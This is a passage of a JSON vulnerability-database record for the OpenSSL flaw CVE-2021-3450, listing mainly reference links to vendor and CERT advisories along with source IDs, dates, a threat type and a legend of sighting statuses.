"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-cve-2021-3449-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-may-affect-ibm-workload-scheduler/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6523070"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4058"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161984/ubuntu-security-notice-usn-4891-1.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-app-connect-enterprise-certified-container-may-be-affected-by-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affects-ibm-infosphere-information-server/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2259.2"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-are-affected-by-vulnerabilities-in-node-js-cve-2021-3450-cve-2021-3449-2/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163257/red-hat-security-advisory-2021-2130-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021051226"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072765"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1225"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041615"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021071904"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1075"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1082.2"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021042114"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101938"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-server-is-affected-by-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1191"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021050609"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2160"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1025"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162151/red-hat-security-advisory-2021-1168-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integration-is-vulnerable-to-openssl-vulnerabilities-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101261"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021062703"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162196/red-hat-security-advisory-2021-1199-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2408"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022041940"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1757"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060315"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162337/red-hat-security-advisory-2021-1369-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022011038"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021062315"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162383/red-hat-security-advisory-2021-1448-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerabilities-affect-ibm-sterling-connectexpress-for-unix-cve-2021-3449-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021050615"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3141"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6479351"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-rational-clearquest-cve-2021-3449-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3450"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3449"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3115"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20305"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10356"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20907"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13631"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20387"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.5/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5018"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-6405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20388"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2021"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13631"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20387"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5018"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19956"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13630"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6405"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20916"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1189"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3115"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.37"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27918"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33197"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33198"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33198"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-34558"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3556"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3421"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3703"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "PACKETSTORM",
"id": "164192"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "PACKETSTORM",
"id": "164192"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-388430"
},
{
"date": "2021-05-19T14:19:18",
"db": "PACKETSTORM",
"id": "162694"
},
{
"date": "2021-04-14T16:31:48",
"db": "PACKETSTORM",
"id": "162172"
},
{
"date": "2021-04-23T15:10:34",
"db": "PACKETSTORM",
"id": "162307"
},
{
"date": "2021-04-15T13:50:04",
"db": "PACKETSTORM",
"id": "162197"
},
{
"date": "2021-09-17T16:04:56",
"db": "PACKETSTORM",
"id": "164192"
},
{
"date": "2021-03-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"date": "2021-03-25T15:15:13.560000",
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-388430"
},
{
"date": "2022-07-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"date": "2023-11-07T03:38:00.923000",
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSL Trust Management Issue Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 0.6
}
}
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.